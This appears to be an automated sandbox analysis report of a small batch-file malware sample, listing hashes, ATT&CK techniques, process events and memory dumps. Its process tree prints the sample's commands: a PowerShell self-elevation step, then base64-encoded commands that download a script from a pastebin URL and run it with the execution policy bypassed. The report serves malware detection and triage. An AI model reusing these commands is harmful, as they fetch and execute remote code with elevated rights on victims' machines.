c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559

General

Target

LHVWN_virus_src.bat
Size

680B
MD5

28a24f08a62dc5c8af6be5e921d4c5ad
SHA1

97f70c14a8e2ba4da9d8f5d65961d7d998ebb637
SHA256

c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559
SHA512

e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577

Score

5^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2508	powershell.exe
2748	powershell.exe
2932	powershell.exe
2704	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2508	powershell.exe
2508	powershell.exe
2508	powershell.exe
2748	powershell.exe
2932	powershell.exe
2704	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 2508	2340	cmd.exe	31
PID 2340 wrote to memory of 2508	2340	cmd.exe	31
PID 2340 wrote to memory of 2508	2340	cmd.exe	31
PID 2508 wrote to memory of 2100	2508	powershell.exe	32
PID 2508 wrote to memory of 2100	2508	powershell.exe	32
PID 2508 wrote to memory of 2100	2508	powershell.exe	32
PID 2100 wrote to memory of 2748	2100	cmd.exe	34
PID 2100 wrote to memory of 2748	2100	cmd.exe	34
PID 2100 wrote to memory of 2748	2100	cmd.exe	34
PID 2100 wrote to memory of 2932	2100	cmd.exe	35
PID 2100 wrote to memory of 2932	2100	cmd.exe	35
PID 2100 wrote to memory of 2932	2100	cmd.exe	35
PID 2932 wrote to memory of 2704	2932	powershell.exe	36
PID 2932 wrote to memory of 2704	2932	powershell.exe	36
PID 2932 wrote to memory of 2704	2932	powershell.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8d1da1ee57166d62891d58f1a32dc822

SHA1
898366a0330efa7fa52988c1d87d1c0a24c5acf1

SHA256
f04042935fe49b3f21fc8b45523551e7ec4c961d977e849f74f19f120554f1b0

SHA512
4e6fb5fad9002e29ce02f12012e88179337de5fed9e6382e479fedaae5996de8bc08231b0423dc3ea1add6b60601fadb73151e09355905625818e08df623ec62

Download Submit
memory/2508-4-0x000007FEF536E000-0x000007FEF536F000-memory.dmp

Filesize
4KB

Download
memory/2508-5-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2508-8-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-7-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2508-10-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-9-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-11-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-12-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

Filesize
9.6MB

Download
memory/2932-23-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/2932-24-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing